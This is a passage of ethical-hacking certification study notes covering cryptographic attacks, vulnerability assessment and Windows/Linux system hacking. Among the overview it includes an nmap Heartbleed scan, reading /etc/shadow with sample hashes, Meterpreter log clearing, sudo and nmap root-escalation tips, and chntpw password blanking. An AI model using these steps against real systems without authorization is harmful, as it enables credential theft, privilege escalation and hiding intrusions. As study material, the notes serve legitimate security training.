to issue and manage certificates 350 | 351 | ## **Key Wrapping and Key Encryption Keys (KEK)** 352 | - KEKs are used as part of key distribution or key exchange. 353 | - key Wrapping - Protect session keys 354 | - If the cipher is a symmetric KEK, both the sender and the receiver will need a copy of the same key 355 | - If using an asymmetric cipher, with public/private key properties, to encapsulate a session key, both the sender and the receiver will need the other's public key 356 | 357 | > ⚠️ **Protocols such as SSL, PGP, and S/MIME use the services of KEKs to provide session key confidentiality, integrity,** and sometimes to authenticate the binding of the session key originator and the session key itself. 358 | 359 | ## Full Disk Encryption - FDE 360 | 361 | - **Data at Rest** (DAR) - data that is in a stored state and not currently accessible 362 | - Usually protected by **full disk encryption** (FDE) with pre-boot authentication 363 | - Example of FDE is Microsoft BitLocker and McAfee Endpoint Encryption 364 | - FDE also gives protection against boot-n-root 365 | 366 | ## Encrypted Communication 367 | 368 | - **Often-Used Encrypted Communication Methods:** 369 | - **Secure Shell** (SSH) - secured version of telnet; uses port 22; relies on public key cryptography; SSH2 is successor and includes SFTP 370 | 371 | - **Secure Sockets Layer (SSL)** - encrypts data at transport layer and above; uses RSA encryption and digital certificates; has a six-step process; largely has been replaced by TLS 372 | 373 | - **Transport Layer Security (TLS)** - uses RSA 1024 and 2048 bits; successor to SSL; allows both client and server to authenticate to each other; TLS Record Protocol provides secured communication channel 374 | 375 | - **Internet Protocol Security (IPSEC)** - network layer tunneling protocol; used in tunnel and transport modes; ESP encrypts each packet 376 | 377 | - **PGP** - Pretty Good Privacy; used for signing, compress and encryption of emails, files and directories; known as hybrid cryptosystem - features conventional and public key cryptography 378 | 379 | - **S/MIME** - standard for public key encryption and signing of MIME data; only difference between this and PGP is PGP can encrypt files and drives unlike S/MIME 380 | 381 | - **Heartbleed** - attack on OpenSSL heartbeat which verifies data was received correctly 382 | - Vulnerability is that a single byte of data gets 64kb from the server 383 | - This data is random; could include usernames, passwords, private keys, cookies; very easy to pull off 384 | - `nmap -d --script ssl-heartbleed --script-args vulns.showall -sV [host]` 385 | - Vulnerable versions include Open SSL 1.0.1 and 1.0.1f 386 | - CVE-2014-0160 387 | 388 | - **FREAK (Factoring Attack on RSA-EXPORT Keys)** - man-in-the-middle attack that forces a downgrade of RSA key to a weaker length 389 | 390 | - **POODLE (Paddling Oracle On Downgraded Legacy Encryption)** - downgrade attack that used the vulnerability that TLS downgrades to SSL if a connection cannot be made 391 | - SSl 3 uses RC4, which is easy to crack 392 | - CVE-2014-3566 393 | - Also called PoodleBleed 394 | 395 | - **DROWN (Decrypting RSA with Obsolete and Weakened Encryption)** - affects SSL and TLS services 396 | - Allows attackers to break the encryption and steal sensitive data 397 | - Uses flaws in SSL v2 398 | - Not only web servers; can be IMAP and POP servers as well 399 | 400 | ## Cryptography Attacks 401 | *Cryptographic attacks approaches that seek to exploit one or more vulnerabilities in a cryptosystem to break it; **Note: Patterns Kill! and it's all about the key!*** 402 | 403 | 404 | - **Frequency Analysis & the Ciphertext Only Attack** 405 | - Examine frequency of letters appearing in the ciphertext 406 | - Attempt to figure out what letters they correspond to plaintext 407 | 408 | - **Known Plain-text attack** 409 | - Has both plain text and cipher-text; plain-text scanned for repeatable sequences which is compared to cipher text 410 | 411 | - **Chosen Cipher-text Attack** 412 | - Chooses a particular cipher-text message 413 | - Attempts to discern the key through comparative analysis 414 | - RSA is particularly vulnerable to this 415 | 416 | - **Chosen Plain-text attack** 417 | - Attacker encrypts multiple plain-text copies in order to gain the key 418 | 419 | - **Adaptive chosen plain-text attack** 420 | - Attacker makes a series of interactive queries choosing subsequent plaintexts based on the information from the previous encryptions; idea is to glean more and more information about the full target cipher text and key 421 | 422 | - **Cipher-text-only attack** 423 | - Gains copies of several encrypted messages with the same algorithm; statistical analysis is then used to reveal eventually repeating code 424 | 425 | - **Replay attack** 426 | - Usually performed within context of MITM attack 427 | - Hacker repeats a portion of cryptographic exchange in hopes of fooling the system to setup a communications channel 428 | - Doesn't know the actual data - just has to get timing right 429 | 430 | - **Side-Channel Attack** 431 | - Monitors environmental factors such as power consumption, timing and delay 432 | 433 | - **Meet-in-the-Middle** 434 | - Used against algorithms that use 2 rounds of encryption. (reason that 2-DES was defeated). 435 | 436 | - **Man-in-the-Middle** 437 | 438 | - **Birthday Attack / Collision Attack / Reverse Hash matching** 439 | - Find flaws in the one-to-one association of the hash function 440 | 441 | - **Timing Attack** 442 | - Based on examining exact execution times of the components in the cryptosystems 443 | 444 | - **Rubber-Hose Attack** 445 | - Based on the use of threats or torture to extract need information 446 | 447 | - **Don't Use Hard-Coded Keys (DUHK) Attack** 448 | - Used against hardware/software that implements ANSI X9.31 Random Number Generation. 449 | 450 | - **Social Engineering Attack** 451 | - Social eng. can be very efficient to grab passwords etc 452 | 453 | **Tools** 454 | - Carnivore and Magic Lantern - used by law enforcement for cracking codes 455 | - L0phtcrack - used mainly against Windows SAM files 456 | - John the Ripper - UNIX/Linux tool for the same purpose 457 | - PGPcrack - designed to go after PGP-encrypted systems 458 | - CrypTool 459 | - Cryptobench 460 | - Jipher 461 | - Keys should still change on a regular basis even though they may be "unhackable" 462 | - Per U.S. government, an algorithm using at least a 256-bit key cannot be cracked 463 | 464 | ## How to defeat attack: 465 | 466 | - **Salt the passwords** - A nonce most commonly associated with password randomization, making the pasword hash unpredictable. 467 | - *If the password database is breached, you can't correlate any passwords because even users with the same password have different hashes stored.* 468 | 469 | - **Pepper** - A large constant number stored separately from the hashed password. 470 | 471 | - **Key stretching** - Combine a very long salt and a huge number of hashing iterations to make cracking even more harder. (e.g Hashing the hashed password N times). 472 | -------------------------------------------------------------------------------- /5-Vulnerability-Analysis.md: -------------------------------------------------------------------------------- 1 | # Vulnerability Analysis 2 | 3 | ## Def. 4 | 5 | **Attackers** perform VA to identify security loopholes in the target's network, and end devices. The identified Vulnerabilities are used by attackers to further exploit the target network. 6 | 7 | **VA Researchers** VA has an important role to play in an organization's security from different internal and external threats. 8 | To secure a network, an administrator needs to perform patch management, install proper antivirus software, check configuration, solve known issues in third-party applications, and troubleshoot hardware default configurations. All these activities together consitutue Vulnerability assessment. 9 | 10 | In this section we will learn: 11 | - Vulnerability Assessment Concepts 12 | - Vulnerability Classification and Assessment Types 13 | - Vulnerability Assessment Solutions and Tools 14 | - Vulnerability Assessment Reports 15 | 16 | 17 | ## Vulnerability Assessment Concepts: 18 | 19 | There are two causes of vulnerable systems in a network: 20 | 1. Misconfiguration in software or Hardware 21 | 2. Poor Programming practices 22 | 23 | Attackers leverage these vulnerabilities to perform different attacks on an organizational resource. 24 | We will be covering Vulnerability Assessment, Vulnerability scoring systems, Vulnerability databases, and the Vulnerability assessment life cycle. 25 | 26 | ## Vulnerability Research 27 | 28 | It is the process of analyzing protocols, services, and configurations to discover the vulnerabilities and design flaws that will expose an OS and its applications to exploit, attack, or misuse. 29 | 30 | An administrator needs Vulnerability Research: 31 | - To gather information about security trends, newly discovered threats, attack surfaces, attack vectors and techniques 32 | - To find weaknessess in the OS and applications and alert the network administrator before a network attack 33 | - To understand information that helps prevent security problems 34 | - To know how to recover from a network attack 35 | 36 | An ethicalhacker needs to keep up with the most recently discovered vulnerabilities and exploits to stay one step ahead of the attackers through vulnerability research which includes: 37 | - Discovering the sytem design faults and weaknesses that might alllow attackers to compromise a system 38 | - Stay updated about new products and technologies and reading news related to currnet exploits 39 | - Checking underground hacking web sites (deep and Dark websites) for newly discovered vulnerabilities and exploits 40 | - Checking newly released alerts regarding relevant innovations and product improverments for security systems 41 | 42 | Security experts and vulnerability scanners classify vulnerabilities by: 43 | - Severity level (low, medium, high) 44 | - Exploit range (local or remote) 45 | 46 | ## Resources for Vulnerability Research 47 | 48 | The following are some of the online websites used to perform vulnerability research: 49 | 50 | - Microsoft Vulnerability Researc (MSVR) (https://www.microsoft.com) 51 | - Dark Readin (https://www.darkreading.com) 52 | - SecurityTracker (https://securitytracker.com) 53 | - Trend Micr (https://www.trendmicro.com) 54 | - Security Magazin (https://www.securitymagazine.com) 55 | - PenTest Magazin (https://pentestmag.com) 56 | - SC Magazin (https://www.scmagazine.com) 57 | - Exploit Databas (https://www.exploit-db.com) 58 | - Security Focu (https://www.securityfocus.com) 59 | - Help Net Securit (https://www.helpnetsecurity.com) 60 | - HackerStor (http://www.hackerstorm.co.uk) 61 | - Computerworl (https://www.computerworld.com) 62 | - WindowsSecurit (http://www.windowsecurity.com) 63 | - D'Cryp (https://www.d-crypt.com) 64 | 65 | ## What is Vulnerability Assessment? 66 | 67 | A vulnerability assessment is an in-depth examination of the ability of a system or application, including current security procedures and controls, to withstand exploitation. It scans networks for known security weaknesses, and recognizes, measures, and classifies security vulnerabilities in computer systems, networks, and communication channels. It identifies, quantifies, and ranks possible vulnerabilities to threats in a system. Additionally, it assists security professionals in securing the network by identifying security loopholes or vulnerabilities in the current security mechanism before attackers can exploit them. 68 | 69 | A vulnerability assessment may be used to: 70 | 71 | - Identify weaknesses that could be exploited 72 | - Predict the effectiveness of additional security measures in protecting information resources from attack 73 | 74 | Typically, vulnerability-scanning tools search network segments for IP-enabled devices and enumerate systems, operating systems, and applications to identify vulnerabilities resulting from vendor negligence, system or network administration activities, or day-to-day activities. Vulnerability-scanning software scans the computer against the Common Vulnerability and Exposures (CVE) index and security bulletins provided by the software vendor. 75 | 76 | Vulnerability scanners are capable of identifying the following information: 77 | 78 | - The OS version running on computers or devices 79 | - IP and Transmission Control Protocol/User Datagram Protocol (TCP/UDP) ports that are listening 80 | - Applications installed on computers 81 | - Accounts with weak passwords 82 | - Files and folders with weak permissions 83 | - Default services and applications that might have to be uninstalled 84 | - Errors in the security configuration of common applications 85 | - Computers exposed to known or publicly reported vulnerabilities 86 | - EOL/EOS software information 87 | - Missing patches and hotfixes 88 | - Weak network configurations and misconfigured or risky ports 89 | - Help to verify the inventory of all devices on the network 90 | 91 | There are two approaches to network vulnerability scanning: 92 | 93 | - **Active Scanning**: The attacker interacts directly with the target network to find vulnerabilities. Active scanning helps in simulating an attack on the target network to uncover vulnerabilities that can be exploited by the attacker. 94 | 95 | **Example**: An attacker sends probes and specially crafted requests to the target host in the network to identify vulnerabilities. 96 | 97 | - **Passive Scanning**: The attacker tries to find vulnerabilities without directly interacting with the target network. The attacker identifies vulnerabilities via information exposed by systems during normal communications. Passive scanning identifies the active operating systems, applications, and ports throughout the target network, monitoring activity to determine its vulnerabilities. This approach provides information about weaknesses but does not provide a path for directly combating attacks. 98 | 99 | **Example**: An attacker guesses the operating system information, applications, and application and service versions by observing the TCP connection setup and teardown. 100 | 101 | 102 | 103 | 104 | 105 | 106 | 107 | 108 | 109 | 110 | 111 | ## Vulnerability-Management Life Cycle 112 | 113 | The process helps identify remediate any potential security weaknesses before they can be exploited. 114 | 115 | 116 | - **Identify Assets and Create a Baseline** 117 | 118 | This phase identifies critical assets and prioritizes them to define the risk based on the criticality and value of eeach system. This created a good baseline for vulnerability management. This phase involves the gathering of information about the identified systems to understand the approved ports, software, drivers, and basic configuration each system in order to develop and maintain a system baseline. 119 | 120 | - **Vulnerability Scan** 121 | 122 | This phase is very crucial in vulnerability management. In this step, the security analyst performs the vulnerability scan on the network to identify the known vulnerabilities in the organization's infrastructure. Vulnerability scans can also be performed on applicable compliance templates to assess the organization's Infrastructure weaknesses against the respective compliance guidelines. 123 | 124 | - **Risk Assessment** 125 | 126 | In this phase, all serious uncertainties that are associated with the system are assessed and prioritized, and remediation is planned to permanently eliminate system flaws. The risk assessment summarizes the vulnerability and risk level identified for each of the selected assets. It determines whether the risk level for a particular asset is high, moderate, or low. Remediation is planned based on the determined risk level. For example, vulnerabilities ranked high-risk are targeted first to decrease the chances of exploitation that would adversely impact the organization. 127 | 128 | - **Remediation** 129 | 130 | Remediation is the process of applying fixes on vulnerable systems in order to reduce the impact and severity of vulnerabilities. This phase is initiated after the successful. implementation of the baseline and assessment steps. 131 | 132 | - **Verification** 133 | 134 | In this phase, the security team performs a re-scan of systems to assess if the required remediation is complete and whether the individual fixes have been applied to the impacted assets. This phase provides clear visibility into the firm and allows the security. team to check whether all the previous phases have been perfectly employed or not. Verification can be performed by using various means such as ticketing systems, scanners, and reports. 135 | 136 | - **Monitor** 137 | 138 | Organizations need to performed regular monitoring to maintain system security. They use tools such as IDS/IPS and firewalls. Continuous monitoring identifies potential threats and any new vulnerabilities that have evolved. As per security best practices, all phases of vulnerability management must be performed regularly. 139 | 140 | -------------------------------------------------------------------------------- /6-System-Hacking.md: -------------------------------------------------------------------------------- 1 | # System Hacking 2 | 3 | > ⚡︎ **This chapter has [practical labs](https://github.com/Samsar4/Ethical-Hacking-Labs/tree/master/5-System-Hacking)** 4 | 5 | ## Goals: 6 | 1. **Gaining Access** - Uses information gathered to exploit the system 7 | - **Password Attacks:** 8 | - **Non-electronic attacks** 9 | - **Active online attacks** 10 | - **Passive online attacks** 11 | - **Offline attacks** 12 | 2. **Escalating Privileges** - Granting the account you've hacked admin or pivoting to an admin account 13 | 3. **Executing Applications** - Putting back doors into the system so that you can maintain access 14 | 4. **Hiding Files** - Making sure the files you leave behind are not discoverable 15 | 5. **Covering Tracks** - Cleaning up everything else (log files, etc.) 16 | - **clearev** - Meterpreter shell command to clear log files (issued inside Metasploit Framework) 17 | - Clear MRU list in Windows 18 | - In Linux, append a dot in front of a file to hide it 19 | 20 | ## Password Attacks 21 | 22 | > ⚡︎ **Check out the practical labs on [Dumping and Cracking SAM hashes [1]](https://github.com/Samsar4/Ethical-Hacking-Labs/blob/master/5-System-Hacking/2-SAM-Hashes.md), [Rainbow Tables Basics [2]](https://github.com/Samsar4/Ethical-Hacking-Labs/blob/master/5-System-Hacking/3-Rainbow-tables.md) and [LLMNR/NBT-NS [3]](https://github.com/Samsar4/Ethical-Hacking-Labs/blob/master/5-System-Hacking/1-LLMNR-NBT-NS.md).** 23 | 24 | ### **Non-electronic** - Non-technical attacks. 25 | - Social engineering attacks - most effective. 26 | - Shoulder surfing 27 | - Dumpster diving 28 | - Snooping around 29 | - Guessing 30 | 31 | ### **Active online** - done by directly communicating with the victim's machine. 32 | 33 | - Includes **Dictionary** and **Brute-force attacks**, **hash injections, phishing, Trojans, spyware, keyloggers and password guessing** 34 | 35 | - **[LLMNR](https://en.wikipedia.org/wiki/Link-Local_Multicast_Name_Resolution) / [NBT-NS](https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-2000-server/cc958811(v=technet.10)?redirectedfrom=MSDN) Poisoning** - attack based off Windows technologies that caches DNS locally. Responding to these poisons the local cache. If an NTLM v2 hash is sent over, it can be sniffed out and then cracked. 36 | - ⚡️ [LLMNR/NBT-NS practical lab](https://github.com/Samsar4/Ethical-Hacking-Labs/blob/master/5-System-Hacking/1-LLMNR-NBT-NS.md) 37 | - **LLMNR uses UDP 5355** 38 | - **NBT-NS uses UDP 137** 39 | - `Responder` is the tool to sniff the access logs from LLMNR / NBT-NS 40 | - ![LLMNR spoofing](https://www.verifyit.nl/wp/wp-content/uploads/2016/12/llmnr_poison1.jpg) 41 | 42 | - **Keylogging** - process of using a hardware device or software application to capture keystrokes of a user 43 | 44 | - Active online attacks are easier to detect and take a longer time 45 | - **Tools for Active Online Attack:** 46 | - `Medusa` 47 | - `Hydra` 48 | - `NBNSpoof` 49 | - `Pupy` 50 | - `Metasploit` 51 | - `Responder` - **LLMNR and NBT-NS responder**, it will answer to *specific* NBT-NS (NetBIOS Name Service) queries based on their name suffix. By default, the tool will only answers to File Server Service request, which is for **SMB**. 52 | - Can combine "net" commands with a tool such as **NetBIOS Auditing tool** or **Legion** to automate the testing of user IDs and passwords 53 | - **Tools for NetBIOS attack:** 54 | - `Hydra` 55 | - `Metasploit` 56 | 57 | ### **Passive online** - **Sniffing** the wire in hopes of **intercepting** a password in clear text or attempting a replay attack or man-in-the-middle attack 58 | 59 | - **Tools for Passive Online Attack:** 60 | - `Cain and Abel` - Can poison ARP and then monitor the victim's traffic; Also used for cracking hash passwords (LM, NTLM), sniff network packets for password, sniff out for local stored passwords, etc. 61 | - `Ettercap` - MITM tool for LAN's, DNS Spoofer; Help against SSL encryption; Intercept the traffic on a network segment, capture passwords, and conduct an active eavesdropping against a number of common protocols. 62 | - `KerbCrack` - built-in sniffer and password cracker looking for port 88 Kerberos traffic 63 | - `ScoopLM` - specifically looks for Windows authentication traffic on the wire and has a password cracker 64 | 65 | > ⚠️ **Services/Protocols that uses Clear text**: 66 | 67 | Service | Port 68 | -|- 69 | FTP | 20/21 70 | TELNET | 23 71 | SMTP | 25 72 | HTTP | 80 73 | POP3 | 110 74 | IMAPv4 | 143 75 | NetBIOS | 139,445 76 | SNMP | 161,162 77 | SQLnet | 1521 78 | 79 | ### **Offline** - when the hacker steals a copy of the password file (Plaintext or Hash) and does the cracking on a separate system. 80 | 81 | - **Dictionary Attack** - uses a word list to attack the password. Fastest method of attacking 82 | 83 | - **Wordlists** - A wordlist or a password dictionary is a collection of passwords stored in plain text. It's basically a text file with a bunch of passwords in it. One popular example of wordlist is the **[rockyou.txt](https://www.kaggle.com/wjburns/common-password-list-rockyoutxt)** containing 14,341,564 unique passwords. 84 | 85 | - You also can generate your own wordlist with given parameters like length, combining letters and numbers, profiling etc. 86 | - Tools for generate Wordlists: 87 | - `CeWL` 88 | - `crunch` 89 | 90 | - **Brute force attack** - Tries every combination of characters to crack a password 91 | 92 | - Can be faster if you know parameters (such as at least 7 characters, should have a special character, etc.) 93 | 94 | - **Hybrid attack** - Takes a dictionary attack and replaces characters (such as a 0 for an o) or adding numbers to the end 95 | 96 | - **Rainbow tables** - Uses pre-hashed passwords to compare against a password hash. Is faster because the hashes are already computed. 97 | 98 | - **Tools for cracking password files (CLI):** 99 | - `John the Ripper` - Works on Unix, Windows and Kerberos; Compatible with MySQL, LDAP and MD4. 100 | - [`Hashcat`](https://hashcat.net/wiki/doku.php?id=hashcat) - Advanced password recovery tool; Provides several options like hash modes OS's, documents, password managers... (MD5, SHA-family, RIPE-MD, NTLM, LM, BitLocker, OSX, MD5 salted or iterated, and the list goes on). 101 | - ![hashcat](https://hashcat.net/hashcat/hashcat.png) 102 | - **Tools for cracking password files (GUI):** 103 | - `Cain & Abel` - Windows software; Cracks hash passwords (LM, NTLM), sniff network packets for password, sniff out for local stored passwords, etc. 104 | - `LOphcrack` - Paid software; Extract and crack hashes; Uses brute force or dictionary attack; 105 | - `Ophcrack` - Free open-source; Cracks Windows log-in passwords by using LM hashes through rainbow tables. 106 | - `Rainbowcrack `- Rainbow tables generator for password cracking 107 | - `Legion` - Legion automates the password guessing in NetBIOS sessions. Legion scans multiple IP address ranges for Windows shares and also offers a manual dictionary attack tool. 108 | - `KerbCrack` - Crack Kerberos passwords. 109 | - `Mimikatz` - Steal credentials and escalate privileges (Windows NTLM hashes and Kerberos tickets(Golden Ticket Attack); 'Pass-the-hash' and 'Pass-the-ticker'). 110 | - `fgdump` - Dump SAM databases on Windows machines. 111 | - `Pwdump7` - Dump SAM databases on Windows machines. 112 | 113 | - **CHNTPW** - chntpw is a software utility for **resetting** or **blanking local passwords used by Windows NT, 2000, XP, Vista, 7, 8, 8.1 and 10**. It does this by editing the SAM database where Windows stores password hashes. 114 | 1. **Physical access** to victim's computer 115 | 2. Startup on BIOS and allow boot to CD or USB 116 | 3. Modify the SAM user account information through the CHNTPW 117 | 118 | > ⚠️ `rtgen`, `winrtgen` - Tools for generate your own rainbow tables. 119 | 120 | > ⚠️ **SAM (Security Account Manager)** is a database file **present in Windows machines that stores user accounts and security descriptors for users on a local computer**. It stores users passwords in a hashed format (in LM hash and NTLM hash). Because a hash function is one-way, this provides some measure of security for the storage of the passwords. 121 | 122 | > ⚠️ **`/etc/shadow`** is where **hashed password data** is stored in **Linux systems** (only users with high privileges can access). 123 | 124 | > ⚠️ **Password attack countermeasures:** 125 | > - **Length of passwords** is good against **brute-force attacks.** 126 | > - **Password complexity** is good against **dictionary attacks.** 127 | 128 | ## Authentication 129 | 130 | - **Three Different Types** 131 | - **Something You Are** - Uses biometrics to validate identity (retina, fingerprint, etc.) 132 | - Downside is there can be lots of false negatives 133 | 134 | - **False acceptance rate (FAR) - Type II** - Likelihood that an unauthorized user will be accepted (This would be bad) 135 | - **False injection rate (FRR) - Type I** - Likelihood that an authorized user will be rejected 136 | - **Crossover error rate (CER)** - Combination of the two; the lower the CER, the better the system 137 | - **Active** - requires interaction (retina scan or fingerprint scanner) 138 | - **Passive** - Requires no interaction (iris scan) 139 | - **Something You Have** - Usually consists of a token of some kind (swipe badge, ATM card, etc.) 140 | - This type usually requires something alongside it (such as a PIN for an ATM card) 141 | - Some tokens are single-factor (such as a plug-and-play authentication) 142 | - **Something You Know** - Better known as a password 143 | - Most systems use this because it is universal and well-known 144 | 145 | - **Two-Factor** - When you have two types of authentication such as something you know (password) and something you have (access card) 146 | 147 | - **Strength of passwords** - Determined by length and complexity 148 | - ECC says that both should be combined for the best outcome 149 | - Complexity is defined by number of character sets used (lower case, upper case, numbers, symbols, etc.) 150 | - **Default passwords** - always should be changed and never left what they came with. Databases such as cirt.net, default-password.info and open-sez.me all have databases of these 151 | 152 | # Windows Security Architecture 153 | 154 | - Authentication credentials stored in SAM file 155 | - File is located at `C:\windows\system32\config` 156 | - Older systems use LM hashing. Current uses NTLM v2 (MD5) 157 | - Windows network authentication uses Kerberos 158 | 159 | ### **LM Hashing** 160 | - Splits the password up. If it's over 7 characters, it is encoded in two sections. 161 | - If one section is blank, the hash will be `AAD3B435B51404EE` 162 | - Easy to break if password is 7 characters or under because you can split the hash 163 | - SAM file presents as `UserName:SID:LM_Hash:NTLM_Hash:::` 164 | 165 | ### **Ntds.dit** 166 | Database file on a domain controller that stores passwords 167 | - Located in %SystemRoot%\NTDS\Ntds.dit or 168 | - Located in %SystemRoot%System32\Ntds.dit 169 | - Includes the entire Active Directory 170 | 171 | ### **Kerberos** for Active Directory Domain Services (AD DS) 172 | 173 | 174 | ![kerberos](https://www.manageengine.com/products/active-directory-audit/kb/images/event-4771-kerberos-authentication-illustration.jpg) 175 | 176 | - Steps of exchange 177 | 1. Client asks **Key Distribution Center** (KDC) for a ticket. Sent in clear text. 178 | 2. Server responds with **Ticket Granting Ticket** (TGT). This is a secret key which is hashed by the password copy stored on the server. 179 | 3. If client can decrypt it, the TGT is sent back to the server requesting a **Ticket Granting Service** (TGS) service ticket. 180 | 4. Server sends TGS service ticket which client uses to access resources. 181 | - **Tools** 182 | - KerbSniff 183 | - KerbCrack 184 | - Both take a long time to crack 185 | 186 | > ⚠️ **Uses TCP/UDP Port 88** 187 | 188 | ### **Registry** 189 | ![registry](https://upload.wikimedia.org/wikipedia/en/5/52/Regstry_Editor.png) 190 | - Collection of all settings and configurations that make the system run 191 | - Made up of keys and values 192 | - Root level keys 193 | - **HKEY_LOCAL_MACHINE** (HKLM) - information on hardware and software 194 | - **HKEY_CLASSES_ROOT** (HKCR) - information on file associates and OLE classes 195 | - **HKEY_CURRENT_USER** (HKCU) - profile information for the current user including preferences 196 | - **HKEY_USERS** (HKU) - specific user configuration information for all currently active users 197 | - **HKEY_CURRENT_CONFIG** (HKCC) - pointer to HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Hardware Profiles\Current 198 | - Type of values 199 | - **REG_SZ** - character string 200 | - **REG_EXPAND_SZ** - expandable string value 201 | - **REG_BINARY** - a binary value 202 | - **REG_DWORD** - 32-bit unsigned integer 203 | - **REG_LINK** - symbolic link to another key 204 | - Important Locations 205 | - HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce 206 | - HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices 207 | - HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce 208 | - HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run 209 | - Executables to edit 210 | - regedit.exe 211 | - regedt32.exe (preferred by Microsoft) 212 | ### **MMC** 213 | ![mmc](https://upload.wikimedia.org/wikipedia/en/b/b7/Microsoft_Management_Console_-_Device_Manager.png) 214 | 215 | - Microsoft Management Console - used by Windows to administer system 216 | 217 | - Has "snap-ins" that allow you to modify sets (such as Group Policy Editor) 218 | 219 | ### **Sigverif.exe** 220 | - ![sigverif](https://cdn.ghacks.net/wp-content/uploads/2015/04/sigverif-file-signature-verification.jpg) 221 | - File Signature Verification (Sigverif.exe) detects signed files and allows you to: 222 | - View the certificates of signed files to verify that the file has not been tampered with after being certified. 223 | - Search for signed files. 224 | - Search for unsigned files. 225 | 226 | # Linux Security Architecture 227 | 228 | ### Linux Directory Structure 229 | - Linux root is just a slash (/) 230 | - Important locations 231 | - **/** - root directory 232 | - **/bin** - basic Linux commands 233 | - **/dev** - contains pointer locations to various storage and input/output systems 234 | - **/etc** - all administration files and passwords. Both password and shadow files are here 235 | - **/home** - holds the user home directories 236 | - **/mnt** - holds the access locations you've mounted 237 | - **/sbin** - system binaries folder which holds more administrative commands 238 | - **/usr** - holds almost all of the information, commands and files unique to the users 239 | 240 | ![linux-architecture](https://www.tecmint.com/wp-content/uploads/2013/09/Linux-Directory-Structure.jpeg) 241 | 242 | 243 | ### Linux Common Commands 244 | 245 | | Command | Description | 246 | | :--------: | ------------------------------------------------------------ | 247 | | `adduser` | Adds a user to the system | 248 | | `cat` | Displays contents of file | 249 | | `cp ` | Copies | 250 | | `ifconfig` | Displays network configuration information | 251 | | `kill ` | Kills a running process | 252 | | `ls ` | Displays the contents of a folder. `-l` option provides most information. | 253 | | `man ` | Displays the manual page for a command | 254 | | `passwd ` | Used to change password | 255 | | `ps ` | Process status. `-ef` option shows all processes | 256 | | `rm ` | Removes files. `-r` option recursively removes all directories and subdirectories | 257 | | `su ` | Allows you to perform functions as another user (super user) | 258 | 259 | - Adding an ampersand after a process name indicates it should run in the background. 260 | - **`pwd`** - displays curennt directory 261 | - **`chmod`** - changes the permissions of a folder or file 262 | - **Read is 4, write is 2 and execute is 1** 263 | - Read | Write | Execute 264 | :--:|:--:|:--: 265 | r-- | -w- | --x 266 | 4 | 2 | 1 267 | - First number is user, second is group, third is others 268 | - when you issue the `ls` command with `-la` flag on Linux, you can see the permissions. As you can see below the file have a permission for everyone (777), will be like this: 269 | - rwxrwxrwx ---> user 270 | - rwxrwxrwx ---> group 271 | - rwxrwxrwx ---> others 272 | - Another example - **755** is **everything for users**, **read/execute for group**, and **read/execute for others** 273 | - rwxr-xr-x ---> user 274 | - rwxr-xr-x ---> group 275 | - rwxr-xr-x ---> others 276 | - You also can set permissions like: `chmod g=rw` (set read/write for groups). 277 | - **Root has UID and GID of 0** - *you can see this information by issuing the command `id`.* 278 | `root@kali:~# id` 279 | - ``` 280 | uid=0(root) gid=0(root) groups=0(root) 281 | ``` 282 | 283 | - First user has UID and GID of 500 (Fedora and CentOS); in most Linux systems the **non-root/normal user are UID and GID of 1000.** 284 | 285 | - `normal-user@kali:~# id` 286 | - ``` 287 | id 288 | uid=1000(kali) gid=1000(kali) groups=1000(kali),24(cdrom),25(floppy),27(sudo),29(audio),30(dip),44(video),46(plugdev),109(netdev),117(bluetooth),132(scanner) 289 | ``` 290 | 291 | - Passwords are stored in **/etc/shadow** for most current systems 292 | - **/etc/passwd** stores passwords in hashes. 293 | - `cat /etc/passwd` 294 | - ``` 295 | root:x:0:0:root:/root:/bin/bash 296 | daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin 297 | bin:x:2:2:bin:/bin:/usr/sbin/nologin 298 | sys:x:3:3:sys:/dev:/usr/sbin/nologin 299 | sync:x:4:65534:sync:/bin:/bin/sync 300 | (...) 301 | ``` 302 | - **/etc/shadow** stores passwords encrypted (hashed and salted) and is only accessible by root 303 | 304 | - `sudo cat /etc/shadow` 305 | - ``` 306 | root:!:18390:0:99999:7::: 307 | daemon:*:18390:0:99999:7::: 308 | bin:*:18390:0:99999:7::: 309 | kali:$6$a/53BntOdPOaghAx$VCAdR3Af97cYTtWCtDp9iksacL3gj2Sgrb12EMix0ITuxc5jOQp1lbaRi.jNDsP2qjV3GvFAqd5Fu.8/7/P1.:18281:0:99999:7::: 310 | (...) 311 | ``` 312 | ## Privilege Escalation and Executing Applications 313 | 314 | > ⚡︎ **Check out the [practical lab on PrivEsc](https://github.com/Samsar4/Ethical-Hacking-Labs/blob/master/5-System-Hacking/5-Escalating-Privileges.md)** 315 | 316 | ### **Vertical** - Lower-level user executes code at a higher privilege level *(e.g.: common user to root/administrator).* 317 | ### **Horizontal** - executing code at the same user level but from a location that would be protected from that access 318 | 319 | 320 | - Crack the password of an admin - primary aim 321 | - Taking advantage of an OS vulnerability 322 | - One way to perform a priv esc is using CVE's in order to perform local shells, c shells, web shells and so on. 323 | - Examples: 324 | - Linux: [DirtyCow](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5195) race-condition vulnerability; 325 | - Windows: [EternalBlue](https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2017-0144) exploits the old Samba version 1 to leverage a Remote code execution (RCE); 326 | 327 | - **DLL Hijacking** - replacing a DLL in the application directory with your own version which gives you the access you need 328 | - In Linux machines is possible to look for **crontabs** and find misconfigurations on privileges. 329 | - In Linux, **insecure `sudo`** can lead a privilege escalation to root; You can check this by typing: `sudo -l`. If there's any system command that allows **NOPASSWD option** this may lead to escalation. 330 | - Nmap old versions you can start **interactive mode** and issue the `!/bin/bash` to elevate root priveleges. 331 | - Use a tool that will provide you the access such as Metasploit 332 | - Social engineering a user to run an application 333 | - ECC refers executing applications as "owning" a system 334 | - **Executing applications** - starting things such as keyloggers, spyware, back doors and crackers 335 | 336 | ## Covert data gathering 337 | ### **Keyloggers** - record keys strokes of a individual computer keyboard or a network of computers. 338 | 339 | - Keylogger when associated with spyware, hels to transmit your information to an unknown third party. 340 | 341 | - **Types of Keyloggers**: 342 | - **Hardware 